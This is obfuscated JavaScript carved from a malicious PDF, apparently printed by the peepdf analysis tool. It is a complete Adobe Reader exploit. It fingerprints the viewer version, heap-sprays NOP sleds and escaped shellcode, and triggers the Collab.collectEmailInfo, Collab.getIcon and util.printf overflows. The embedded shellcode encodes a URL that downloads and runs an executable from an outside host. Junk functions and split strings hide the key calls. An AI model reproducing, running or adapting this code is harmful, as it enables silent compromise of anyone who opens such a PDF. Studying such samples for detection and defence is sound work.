// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%', 'u4343%u4', '343%u0', 'FEB%u33', '5B%u66C9', '%u80B9', '%u8001', '%uEF33%', 'uE243%u', 'EBFA%uE', '805%uFFE', 'C%uFFF', 'F%u8B7F%', 'uDF4E%', 'uEFEF%u', '64EF%uE3', 'AF%u9F64', '%u42F3%u', '9F64%u6E', 'E7%uEF0', '3%uEFE', 'B%u64', 'EF%uB9', '03%u618', '7%uE1A1%', 'u0703%u', 'EF11%', 'uEFEF%', 'uAA66%uB', '9EB%u77', '87%u6', '511%u0', '7E1%uEF1', 'F%uEFE', 'F%uAA6', '6%uB9E7%', 'uCA87', '%u105F%', 'u072D%uE', 'F0D%uEFE', 'F%uAA', '66%uB9E3', '%u0087%u', '0F21%u07', '8F%uEF', '3B%uEFEF', '%uAA66%', 'uB9FF%', 'u2E87', '%u0A96%u', '0757%uEF', '29%uEFEF', '%uAA66', '%uAFFB', '%uD76', 'F%u9A2', 'C%u66', '15%uF7A', 'A%uE806%', 'uEFEE', '%uB1E', 'F%u9A66', '%u64CB', '%uEBAA%u', 'EE85%u', '64B6%u', 'F7BA%u0', '7B9%uE', 'F64%uE', 'FEF%u87B', 'F%uF5', 'D9%u9FC', '0%u7807', '%uEFEF%', 'u66EF%uF', '3AA%u', '2A64%u2', 'F6C%u66B', 'F%uCF', 'AA%u1087', '%uEFE', 'F%uBF', 'EF%uAA', '64%u85', 'FB%uB', '6ED%uBA6', '4%u07F', '7%uEF8', 'E%uEFE', 'F%uAAE', 'C%u28C', 'F%uB3E', 'F%uC1', '91%u288A', '%uEBAF', '%u8A97%u', 'EFEF%', 'u9A10%', 'u64CF%uE', '3AA%uE', 'E85%u', '64B6%uF', '7BA%u', 'AF07%uEF', 'EF%u85E', 'F%uB7', 'E8%uAAE', 'C%uDCC', 'B%uBC34', '%u10BC', '%uCF9A', '%uBCB', 'F%uAA64', '%u85F3%u', 'B6EA%uBA', '64%u07F', '7%uEFCC', '%uEFEF%', 'uEF85', '%u9A10%', 'u64CF%uE', '7AA%uED8', '5%u64B', '6%uF7BA', '%uFF07%', 'uEFEF%', 'u85EF%', 'u6410%uF', 'FAA%uEE8', '5%u64B', '6%uF7BA%', 'uEF07%uE', 'FEF%uA', 'EEF%uBDB', '4%u0E', 'EC%u0E', 'EC%u0EE', 'C%u0EEC', '%u036', 'C%uB5EB', '%u64B', 'C%u0D35', '%uBD18%', 'u0F10%u', '64BA%', 'u6403%uE', '792%uB2', '64%uB9E', '3%u9C64', '%u64D3', '%uF19', 'B%uEC9', '7%uB9', '1C%u996', '4%uECCF%', 'uDC1C%uA', '626%u42', 'AE%u2', 'CEC%u', 'DCB9%u', 'E019%', 'uFF51%u', '1DD5%', 'uE79B%', 'u212E%u', 'ECE2%u', 'AF1D%u1', 'E04%u', '11D4%u9A', 'B1%uB5', '0A%u046', '4%uB5', '64%uEC', 'CB%u8', '932%uE3', '64%u64A', '4%uF3', 'B5%u3', '2EC%uEB6', '4%uEC64', '%uB12', 'A%u2DB2', '%uEFE', '7%u1B', '07%u10', '11%uBA', '10%uA3', 'BD%uA', '0A2%uEFA', '1%u7468%', 'u7074%', 'u2F3A%', 'u772F%', 'u7777%u', '652E%u', '6176%u', '676E%u6C', '65%u7369', '%u6863%', 'u692D%u2', 'D6E%u617', '2%u6874%', 'u642E%u2', 'F65%u', '6C66%u7', '361%u', '2F68%u', '7865%u', '2E65%', 'u6870%', 'u3F70%', 'u3D78%', 'u6470%', 'u0066');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

